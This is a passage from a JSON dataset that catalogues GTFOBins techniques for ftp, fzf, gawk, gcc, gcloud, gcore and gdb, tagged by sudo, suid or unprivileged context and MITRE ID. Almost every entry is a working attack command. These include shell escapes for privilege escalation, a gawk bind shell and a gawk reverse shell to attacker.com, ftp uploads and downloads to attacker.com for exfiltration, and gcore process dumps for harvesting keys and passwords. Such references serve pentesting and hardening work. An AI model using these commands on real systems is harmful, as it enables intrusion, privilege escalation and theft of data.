string.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:download:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:download:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:shell:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:shell:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:shell:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:upload:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:upload:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:upload:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:command:0:sudo","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:command:0:suid","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:command:0:unprivileged","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:shell:0:sudo","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:shell:0:suid","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:shell:0:unprivileged","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gawk:bind-shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:bind-shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:bind-shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-read:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-read:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-read:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-write:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-write:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-write:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:reverse-shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:reverse-shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:reverse-shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gcc:file-read:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcc -x c -E /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:file-read:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcc -x c -E /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:file-read:1:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcc @/path/to/input-file","description":"The file is read and parsed as a list of files (one per line), the content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:file-read:1:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcc @/path/to/input-file","description":"The file is read and parsed as a list of files (one per line), the content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:file-write:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gcc -x c /dev/null -o /path/to/input-file","description":"This actually deletes the file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:file-write:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gcc -x c /dev/null -o /path/to/input-file","description":"This actually deletes the file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:shell:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gcc -wrapper /bin/sh,-s x","description":"In some older versions, the `x` argument must instead reference any existing file.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:shell:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gcc -wrapper /bin/sh,-s x","description":"In some older versions, the `x` argument must instead reference any existing file.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcloud:inherit:0:sudo","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcloud/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gcloud:inherit:0:suid","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gcloud/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gcloud:inherit:0:unprivileged","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcloud/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gcore:file-read:0:sudo","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gcore:file-read:0:suid","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gcore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gcore:file-read:0:unprivileged","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:file-write:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:file-write:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:file-write:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:inherit:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:inherit:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:inherit:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 